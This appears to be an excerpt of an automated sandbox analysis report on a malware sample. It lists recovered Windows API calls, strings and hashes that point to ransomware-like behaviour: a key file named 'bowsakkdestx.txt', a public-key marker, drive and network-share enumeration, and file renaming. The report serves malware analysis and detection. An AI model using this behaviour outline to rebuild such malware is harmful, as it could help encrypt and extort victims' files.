                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0047E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F6
                                                                                                                            • _strstr.LIBCMT ref: 0047EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0047EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EB7C
                                                                                                                            • _malloc.LIBCMT ref: 0047EB86
                                                                                                                            • _memset.LIBCMT ref: 0047EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0047EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EBB6
                                                                                                                            • _strstr.LIBCMT ref: 0047EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EC32
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                            • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 2805819797-1771568745
                                                                                                                            • Opcode ID: 920ab47d1aa3f86d324baca30e2bf9adcbea66ea8b6ea5862a5b8517ffcdc499
                                                                                                                            • Instruction ID: 1c074ea7080a6dd3ca8b1fc97f1e384f3ed11f6aa9947bcdf21ffc5df3574b87
                                                                                                                            • Opcode Fuzzy Hash: 920ab47d1aa3f86d324baca30e2bf9adcbea66ea8b6ea5862a5b8517ffcdc499
                                                                                                                            • Instruction Fuzzy Hash: 02019230448381AAD630EF119C05BDF7B9CAF55708F04885EF98892182EB78920DC7AB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,0047EE2F), ref: 00471B1E
                                                                                                                            • timeGetTime.WINMM(?,?,0047EE2F), ref: 00471B29
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471B4C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00471B5C
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471B6A
                                                                                                                            • Sleep.KERNEL32(00000064,?,?,0047EE2F), ref: 00471B72
                                                                                                                            • timeGetTime.WINMM(?,?,0047EE2F), ref: 00471B78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3697694649-0
                                                                                                                            • Opcode ID: 201cb8417f29f97518eb8715fa11cd0b52ac85b920dbc2a61c21f35a4a8d9be7
                                                                                                                            • Instruction ID: e22111e1a8fc4ac874f932cd817cc5f8ff663f5d2b10c1ffdd4ba5ed3842f039
                                                                                                                            • Opcode Fuzzy Hash: 201cb8417f29f97518eb8715fa11cd0b52ac85b920dbc2a61c21f35a4a8d9be7
                                                                                                                            • Instruction Fuzzy Hash: 3A018832A40319A6DB20D7E99C45FEEB76CBF18B40F044466F704B7191E674B905CBE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0046C51B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C539
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: 5403806752086b01698c97b37d8ebb0a451db5805923036113c57cd58930fa27
                                                                                                                            • Instruction ID: 45748298a9b2119e8af203546cdad32feeb125941ba6ea97c4375ee677fe02b2
                                                                                                                            • Opcode Fuzzy Hash: 5403806752086b01698c97b37d8ebb0a451db5805923036113c57cd58930fa27
                                                                                                                            • Instruction Fuzzy Hash: 43110AB2B4122833D930756A6C87FEF775C9F52B26F0004A7FE0CD2142B5AA995942E6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0047BAAD
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0047BABE
                                                                                                                            • UpdateWindow.USER32(00000000), ref: 0047BAC5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShowUpdate
                                                                                                                            • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                            • API String ID: 2944774295-3503800400
                                                                                                                            • Opcode ID: 210611b276f7045e50f6d2029047f6ffd23811cd4b8924b9dd051efc836933f7
                                                                                                                            • Instruction ID: cb306d8098a1dfe9ad6d2ff6ae07a41a6921f64a229ffaf82036fab704ca95e4
                                                                                                                            • Opcode Fuzzy Hash: 210611b276f7045e50f6d2029047f6ffd23811cd4b8924b9dd051efc836933f7
                                                                                                                            • Instruction Fuzzy Hash: A7E04F3168172077E33197147C0BF9A2D14FB22F20F30440AFA047A2D1C6E56D46AADC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00470C12
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00470C39
                                                                                                                            • _memset.LIBCMT ref: 00470C4C
                                                                                                                            • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00470C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 364255426-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00470A75
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00560234,00000002), ref: 00470AE2
                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00470AF9
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00470B02
                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 00470B1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2560635915-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0046F125
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 0046F198
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 0046F1A1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0046F1A8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1421093161-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0047B1BA
                                                                                                                              • Part of subcall function 004711C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0047120F
                                                                                                                              • Part of subcall function 004711C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00471228
                                                                                                                              • Part of subcall function 004711C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0047123D
                                                                                                                              • Part of subcall function 004711C0: MoveFileW.KERNEL32(00000000,?), ref: 00471277
                                                                                                                              • Part of subcall function 0047BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0047BA4A
                                                                                                                              • Part of subcall function 0047BA10: RegisterClassExW.USER32(00000030), ref: 0047BA73
                                                                                                                              • Part of subcall function 0047BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0047BAAD
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0047B4B3
                                                                                                                            • TranslateMessage.USER32(?), ref: 0047B4CD
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047B4D7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                            • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                            • API String ID: 441990211-897913220
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00483B64
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • std::exception::exception.LIBCMT ref: 00483B82
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00483B97
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3074076210-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004B4AE0: GetStdHandle.KERNEL32(000000F4,004B4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004B480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,004B1D37,00000000,0046CDAE,00000001,00000001), ref: 004B4AFA
                                                                                                                              • Part of subcall function 004B4AE0: GetFileType.KERNEL32(00000000), ref: 004B4B05
                                                                                                                              • Part of subcall function 004B4AE0: __vfwprintf_p.LIBCMT ref: 004B4B27
                                                                                                                            • _raise.LIBCMT ref: 004B4C18
                                                                                                                              • Part of subcall function 0048A12E: __getptd_noexit.LIBCMT ref: 0048A16B
                                                                                                                              • Part of subcall function 00487CEC: _doexit.LIBCMT ref: 00487CF6
                                                                                                                            Strings
                                                                                                                            • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 004B4C0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                            • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                            • API String ID: 2149077303-4210838268
                                                                                                                            • Opcode ID: 6918172f6aa70a9c6c04f2eec9ca4ff520f23c9e8130120c2123fe9f764eca90
                                                                                                                            • Instruction ID: c5a3b9159c9b93735f416e65793988c04d626651bbc0383db7b81e79d80ece31
                                                                                                                            • Opcode Fuzzy Hash: 6918172f6aa70a9c6c04f2eec9ca4ff520f23c9e8130120c2123fe9f764eca90
                                                                                                                            • Instruction Fuzzy Hash: 9AD05E794882047FED013790DC07A0E7B51EF88718F408819F2AE000A2D6B6C120A71B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2799698630-0
                                                                                                                            • Opcode ID: c0f6fbd4d161bd1c7a07a62af20c18cc4a2147ad8314892ad882a40186538de1
                                                                                                                            • Instruction ID: 76bf15182a06890a2aebc7699a6fc384f61425c29c44d808be58a42648686797
                                                                                                                            • Opcode Fuzzy Hash: c0f6fbd4d161bd1c7a07a62af20c18cc4a2147ad8314892ad882a40186538de1
                                                                                                                            • Instruction Fuzzy Hash: D6519E70C00258DAEF20EB60DD457DFB7B5BF21318F0040AAD40E67251E77AAA89CF5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0048FB7B
                                                                                                                              • Part of subcall function 00488AF7: __mtinitlocknum.LIBCMT ref: 00488B09
                                                                                                                              • Part of subcall function 00488AF7: __amsg_exit.LIBCMT ref: 00488B15
                                                                                                                              • Part of subcall function 00488AF7: EnterCriticalSection.KERNEL32(00000000,?,004850D7,0000000D), ref: 00488B22
                                                                                                                            • __tzset_nolock.LIBCMT ref: 0048FB8E
                                                                                                                              • Part of subcall function 0048FE47: __lock.LIBCMT ref: 0048FE6C
                                                                                                                              • Part of subcall function 0048FE47: ____lc_codepage_func.LIBCMT ref: 0048FEB3
                                                                                                                              • Part of subcall function 0048FE47: __getenv_helper_nolock.LIBCMT ref: 0048FED4
                                                                                                                              • Part of subcall function 0048FE47: _free.LIBCMT ref: 0048FF07
                                                                                                                              • Part of subcall function 0048FE47: _strlen.LIBCMT ref: 0048FF0E
                                                                                                                              • Part of subcall function 0048FE47: __malloc_crt.LIBCMT ref: 0048FF15
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1282695788-0
                                                                                                                            • Opcode ID: 96d6c869f0af39883e35fb05bbd5a31938bcaed80bf37bd34b4e6be2b34af4ea
                                                                                                                            • Instruction ID: 765a56c5f03115d4445ba7584c69f2dcc45a2302bb122a8e22139a8ae99c39fb
                                                                                                                            • Opcode Fuzzy Hash: 96d6c869f0af39883e35fb05bbd5a31938bcaed80bf37bd34b4e6be2b34af4ea
                                                                                                                            • Instruction Fuzzy Hash: 97E0E634551644DAD720BBB6E91A71C7160AB10329F50991FD414111D24FBC15CCEB2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 00487B11
                                                                                                                              • Part of subcall function 00487AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00487B16,00000000,?,00488BCA,000000FF,0000001E,00567BD0,00000008,00488B0E,00000000,00000000), ref: 00487AE6
                                                                                                                              • Part of subcall function 00487AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00487AF8
                                                                                                                            • ExitProcess.KERNEL32 ref: 00487B1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2427264223-0
                                                                                                                            • Opcode ID: 064c6db91c207f9404f7a77c6c6b2f2c8549851e5ea9403b35a344e00f98703b
                                                                                                                            • Instruction ID: fa7413996304f0347a65eb69a8b915408f0931ee0ea5a9b8ae6a68151094643b
                                                                                                                            • Opcode Fuzzy Hash: 064c6db91c207f9404f7a77c6c6b2f2c8549851e5ea9403b35a344e00f98703b
                                                                                                                            • Instruction Fuzzy Hash: 74B09230004108BBCB093F52DC0A85D3F2AEF01390F108025F90408032EFB2AA92AAC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004718DD
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004718E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFreeHandleVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2443081362-0
                                                                                                                            • Opcode ID: 7363862000c422080f0dd162fc9100bcc2975a4de13f983199d5cbb3722a5228
                                                                                                                            • Instruction ID: 5f9d6ac8011b7df6ab4fcb4ab5ac74a61d14267af85432cbf749cf236a207151
                                                                                                                            • Opcode Fuzzy Hash: 7363862000c422080f0dd162fc9100bcc2975a4de13f983199d5cbb3722a5228
                                                                                                                            • Instruction Fuzzy Hash: C4E08636A01504DBC7209B9CEC8079DB374FB89B20F21436AD919733D147352D0A9985
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004769DF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 120817956-0
                                                                                                                            • Opcode ID: 2c545b1fec7d90c27ff4b83ce1be4cc37c5c656f327c660adca26681e08ebe91
